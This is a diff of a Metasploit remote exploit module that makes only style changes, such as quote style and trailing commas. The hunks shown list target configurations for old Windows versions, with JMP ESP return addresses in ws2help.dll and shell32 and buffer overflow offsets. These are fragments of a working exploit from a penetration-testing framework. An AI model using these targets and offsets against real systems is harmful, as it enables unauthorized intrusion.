@@ -42,17 +42,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'StackAdjustment' => -3500,
           'Compat' =>
                         {
-                          'ConnectionType' => "-find"
+                          'ConnectionType' => '-find'
                         }
         },
-        'Platform' => %w{win},
         'Targets' => [
           [
             'Windows 2000 English', # Tested OK - hdm 11/24/2005
             {
               'Platform' => 'win',
               'Ret' => 0x75022ac4, # ws2help.dll
-              'Offset' => 229,
+              'Offset' => 229
             },
           ],
           [
@@ -60,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Ret' => 0x71aa32ad, # ws2help.dll
-              'Offset' => 229,
+              'Offset' => 229
             },
           ],
           [
@@ -68,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Ret' => 0x77681799, # ws2help.dll
-              'Offset' => 229,
+              'Offset' => 229
             },
           ],
           [
@@ -76,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'win',
               'Ret' => 0x775F29D0,
-              'Offset' => 229,
+              'Offset' => 229
             },
           ],
           [
@@ -85,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'win',
               'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
               # 'Ret'      => 0x775C2C1F,   # 775C2C1F JMP ESP shell32.data SP1
-              'Offset' => 245,
+              'Offset' => 245
             },
           ],
         ],
